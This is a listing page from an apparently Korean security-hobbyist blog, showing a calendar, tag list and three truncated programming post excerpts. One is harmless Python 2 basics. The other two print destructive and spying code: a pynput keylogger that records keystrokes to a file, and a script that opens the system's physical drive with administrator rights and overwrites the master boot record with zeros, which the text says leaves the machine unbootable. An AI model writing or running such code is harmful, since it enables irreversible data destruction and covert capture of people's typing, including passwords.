일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- 화학물질불법유통온라인감시단
- 프로젝트
- Los
- 웹 해킹 입문
- 국가정보원
- 대외활동
- 불법유통
- nurisec
- 경기팀
- 화학물질안전원
- 기타정보
- codeup
- PHP
- 도구모음
- 국가기록원
- MITRE ATT&CK
- UKPT level
- 연구모임
- 12기
- 화학물질
- 정보보안
- 파이썬
- 국정원
- suninatas
- webhacking
- 불법유통근절
- UKPT
- HTML
- Service
- 여행
- Today
- Total
목록Ⅰ. 프로그래밍 (58)
agencies
* 파이썬 2.7.6 (기준)으로 작성되었습니다. 기본 문법 #story of "hong gil dong" name = "Hong Gil Dong" age = 18 weight = 69.3 skill = ["sword", "spear", "bow", "axe"] power = [98.5, 89.2, 100, 79.2] querySkill = raw_input("select weapon: ") print "\n" print "------------------------------------------" print "1.name:", name print "2.age:", age print "3.weight:", weight i=0 for each_item in skill: if(each_item == que..
from pynput import keyboard def on_press(key): try: print(f'{key.char}') except AttributeError: # 특수 키 처리 print(f'{key}') def on_release(key): if key == keyboard.Key.esc: # 리스너 중단 return False # 키 이벤트가 발생할 때까지 이벤트를 수집 with keyboard.Listener(on_press=on_press, on_release=on_release) as listener: listener.join() 실행화면 메모장에 저장하는 소스코드 from pynput import keyboard f = open("write.txt","a") def on_press..
※ 해당 프로그램을 실행하기에 앞서 주의를 부탁드립니다. mbr 프로그램을 관리자 권한으로 실행합니다. MBR 부분이 0x00 의 값으로 모두 변경이 되었습니다. 재부팅을 하면 다음과 같은 화면이 나타납니다. import time # Specify the disk to read and write (e.g., "\\\\.\\PhysicalDrive0") disk_path = r"\\.\PhysicalDrive0" try: # Open the disk for writing with open(disk_path, "rb+") as disk_file: # Seek to the beginning of the disk (MBR start) disk_file.seek(0) # Modify MBR to all 0x00 ..